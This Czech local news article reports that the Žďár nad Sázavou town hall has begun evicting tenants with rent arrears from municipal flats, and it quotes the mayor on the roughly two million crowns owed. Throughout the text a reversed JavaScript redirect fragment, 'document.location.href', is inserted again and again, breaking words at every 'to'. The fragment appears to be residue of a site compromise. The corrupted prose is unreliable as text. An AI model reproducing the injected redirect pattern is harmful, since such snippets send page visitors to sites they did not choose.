Žďár nad Sázavou, zdar nad sazavou, aktuality, neplatiči, vystěhování
Rainbow page separator

Ve Žďáře začali vystěhovávat neplatiče

Pondělí, 28. ledna 2013

Žďár nad Sázavou / Neplatiče nájmu v městských bytech už nehodlají dál [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tolerovat zástupci žďárské radnice, a pro[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to došlo k vystěhování prvního z bytů. Příští týden má následovat další. „Déle [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to už [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tolerovat nemůžeme, navíc evidujeme dost lidí, kteří by o byty stáli a nájemné platili. Kromě [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toho nechceme, aby bylo veřejností vnímáno, že neplatičům projde všechno a že o vystěhování budeme jenom mluvit, ale stejně nic neuděláme,“ vyjádřila se žďárská starostka Dagmar Zvěřinová.

První z vyklizených bytů používala neplatící nájemnice jako skladiště svých věcí, pro[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tože v bytě už nějakou dobu sama nežila. Všechny její movité věci v bytě byly sepsány a nafoceny, nyní budou půl roku uskladněny v neby[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tových pros[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torách domu. Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to jí vyúčtuje náklady spojené s vyklizením bytu i za uskladnění majetku.

Dalších pět neplatících nájemníků má nyní několik týdnů na [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to, aby svoje závazky splnili. Konkrétně do 20. února.

Neplatiči nájemného městu dluží kolem dvou milionů korun, přičemž nejvyšší dluh činí přes 126 tisíc. „Snažili jsme se maximálně vyjít vstříc ženám s dětmi, nemocným lidem, případně těm, kteří se náhle ocitli ve finanční krizi. A všem, již se s námi nějakým způsobem snažili spolupracovat. Je ovšem ale i hodně neplatičů, kteří na naše výzvy nereagují, o splátkový kalendář nemají zájem, dluh narůstá a jim i nám je jasné, že tímhle způsobem je nemožné ho umořit. A [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to už opravdu nehodláme trpět,“ dodala Zvěřinová.